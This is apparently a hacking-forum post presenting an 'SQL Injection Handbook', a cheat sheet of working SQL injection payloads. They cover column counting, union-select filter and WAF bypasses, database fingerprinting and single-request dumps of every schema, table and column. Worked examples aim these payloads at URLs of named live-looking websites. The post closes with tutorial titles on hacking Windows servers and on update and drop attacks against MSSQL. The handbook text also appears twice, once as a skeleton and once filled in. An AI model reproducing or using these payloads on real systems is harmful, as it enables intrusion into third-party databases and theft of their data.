Hi HF, this is my SQL Injection Handbook, and I am happy to share it with anyone who is interested in SQL injection.
OK let's start with my HandBook
Order By - get column count - method
Integer Injection method
+Order+By+100 --
+Group+by+99 --
+Order+By+119449 --
+Group+by+119449 --
+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99
String Injection method
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
☆¸.•*☆ ☆*•.¸☆
union select ByPassing method
☆¸.•*☆ ☆*•.¸☆
:: Buffer Overflow ::
+And(select 1)=(select 0x414)+union+select+1--
+And(select 1)=(select 0xAAAA)+union+select+1--
☆¸.•*☆ ☆*•.¸☆
:: 400 Bad Request ::
--+%0A
☆¸.•*☆ ☆*•.¸☆
null the parameter
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
☆¸.•*☆ ☆*•.¸☆
Group_Concat
☆¸.•*☆ ☆*•.¸☆
To make the column number appear in the page, put this after the id
id=1+and+1=0+union+select+1,2,3,4,5,6
+AND+1=0
/*!aND*/ 1 like 0
+/*!and*/+1=0
+and+2>3+
+and(1)=(0)
and (1)!=(0)
+div+0
Having+1=0
☆¸.•*☆ ☆*•.¸☆
function ByPassing
convert(value using ascii)
'ascii' doesn't work? You can try
☆¸.•*☆ ☆*•.¸☆
avoid source page injection
concat(?">,<br><br><br>,@@version,?<img src=",?<?'#)
"><br>? <img src="
<img src=''''/>injection<img src=''
concat('</title>',@@version,'<title>')
☆¸.•*☆ ☆*•.¸☆
get version - DB_NAME - user - HOST_NAME - datadir
version()
convert(version() using latin1)
unhex(hex(version()))
@@GLOBAL.VERSION
(substr(@@version,1,1)=5) :: 1 true, 0 false
# like #
1 means version 5 and 0 means version 4
☆¸.•*☆ ☆*•.¸☆
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
download good version 5
not download good version 4
☆¸.•*☆ ☆*•.¸☆
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
☆¸.•*☆ ☆*•.¸☆
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1=0/@@version;--
') and 1=@@version--
and 1=0/user;--
☆¸.•*☆ ☆*•.¸☆
Requested method
#1#
[DUMP DB in 1 Request]
☆¸.•*☆ ☆*•.¸☆
[DUMP DB in 1 Request improve]
like
☆¸.•*☆ ☆*•.¸☆
#2#
method like DUMP DB in 1 Request
like
☆¸.•*☆ ☆*•.¸☆
#3#
How to know the count of databases, tables, and columns
databases
# like #
tables
# like #
columns
# like #
☆¸.•*☆ ☆*•.¸☆
#4#
show the table with all its columns
like
# play with limit #
☆¸.•*☆ ☆*•.¸☆
#5#
filtered request
# tables #
or
# columns #
/*!froM*/ table-- -
☆¸.•*☆ ☆*•.¸☆
#6#
bypass method
like
☆¸.•*☆ ☆*•.¸☆
#7#
bypass method
like
OK let's start with my HandBook
Order By - get column count - method
Integer Injection method
+Order+By+100 --
+Group+by+99 --
+Order+By+119449 --
+Group+by+119449 --
+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99
String Injection method
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/**/99%23%23
'+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99 +--+
☆¸.•*☆ ☆*•.¸☆
union select ByPassing method
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se%6cect*/+
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--+
+UnIoN/*&a=*/SeLeCT/*&a=*/
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
UnIoN SeLeCt CoNcAt(version())--
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
☆¸.•*☆ ☆*•.¸☆
:: Buffer Overflow ::
+And(select 1)=(select 0x414)+union+select+1--
+And(select 1)=(select 0xAAAA)+union+select+1--
+And(select 1)=(select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+
☆¸.•*☆ ☆*•.¸☆
:: 400 Bad Request ::
--+%0A
union+select+1--+%0A,2--+%0A,3--+%0A,4--+%0A,5--+%0A --
☆¸.•*☆ ☆*•.¸☆
null the parameter
id=-1
id=null
id=1+and+false+
id=9999
id=1 and 0
id==1
id=(-1)
☆¸.•*☆ ☆*•.¸☆
Group_Concat
Group_Concat
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)
☆¸.•*☆ ☆*•.¸☆
To make the column number appear in the page, put this after the id
id=1+and+1=0+union+select+1,2,3,4,5,6
+AND+1=0
/*!aND*/ 1 like 0
+/*!and*/+1=0
+and+2>3+
+and(1)=(0)
and (1)!=(0)
+div+0
Having+1=0
☆¸.•*☆ ☆*•.¸☆
function ByPassing
unhex(hex(value))
cast(value as char)
uncompress(compress(version()))
cast(version() as char)
aes_decrypt(aes_encrypt(version(),1),1)
binary(version())
convert(value using ascii)
'ascii' doesn't work? You can try
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
☆¸.•*☆ ☆*•.¸☆
avoid source page injection
concat(?">,<br><br><br>,@@version,?<img src=",?<?'#)
"><br>? <img src="
<img src=''''/>injection<img src=''
concat(0x223e,@@version)
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x223e,@@version,0x3c696d67207372633d22)
concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
concat(0x223e3c62723e,@@version,0x3a,"BlackRose",0x3c696d67207372633d22)
concat('</title>',@@version,'<title>')
concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
☆¸.•*☆ ☆*•.¸☆
get version - DB_NAME - user - HOST_NAME - datadir
version()
convert(version() using latin1)
unhex(hex(version()))
@@GLOBAL.VERSION
(substr(@@version,1,1)=5) :: 1 true, 0 false
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 --
1 means version 5 and 0 means version 4
☆¸.•*☆ ☆*•.¸☆
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=5
download good version 5
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=4
not download good version 4
☆¸.•*☆ ☆*•.¸☆
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /*!50095aaaa*/ no error v5
☆¸.•*☆ ☆*•.¸☆
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
☆¸.•*☆ ☆*•.¸☆
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 --
www.marinaplast.com/page.php?id=vv()
☆¸.•*☆ ☆*•.¸☆
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --
☆¸.•*☆ ☆*•.¸☆
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 --
☆¸.•*☆ ☆*•.¸☆
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 --
☆¸.•*☆ ☆*•.¸☆
ASPX
and 1=0/@@version
' and 1=0/@@version;--
') and 1=@@version--
and 1=0/user;--
☆¸.•*☆ ☆*•.¸☆
Requested method
#1#
[DUMP DB in 1 Request]
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
(select(@) from (select (@:=0x00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
☆¸.•*☆ ☆*•.¸☆
[DUMP DB in 1 Request improve]
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
☆¸.•*☆ ☆*•.¸☆
#2#
method like DUMP DB in 1 Request
concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
like
http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0x00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
☆¸.•*☆ ☆*•.¸☆
#3#
How to know the count of databases, tables, and columns
databases
(select+count(schema_name) +from+information_schema.schemata)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 --
tables
(select+count(table_name) +from+information_schema.tables)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 --
columns
(select+count(column_name) +from+information_schema.columns)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 --
☆¸.•*☆ ☆*•.¸☆
#4#
show the table with all its columns
CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1--+
like
www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1--+
# play with limit #
☆¸.•*☆ ☆*•.¸☆
#5#
filtered request
# tables #
group_concat(/*!table_name*/)
+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES-- -
or
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()-- -
# columns #
group_concat(/*!column_name*/)
+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!froM*/ table-- -
☆¸.•*☆ ☆*•.¸☆
#6#
bypass method
(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
like
www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 --
☆¸.•*☆ ☆*•.¸☆
#7#
bypass method
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
like
www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)--
This is the end of my handbook.
If anybody needs an explanation of anything, just tell me.
And these are my tutorials; I hope they help you.
Fingerprint How to know DB and method of injection
[Cheat Sheet] sql Injection Professional Guide for Beginners & many WAF Bypassing TRK
WAF Bypassing [ very details Thread For beginners and Easy]
[TUT] Bypassing 500 Error using [Buffer Overflow Query]
MS-SQL(Microsoft Server SQL) Injection
How to extract data in a way easy from Microsoft_db [Tables/Columns at once]
how to make update & drop to (Microsoft SQL Server)
How to (HaCk windows server site Via) injected Image & full Index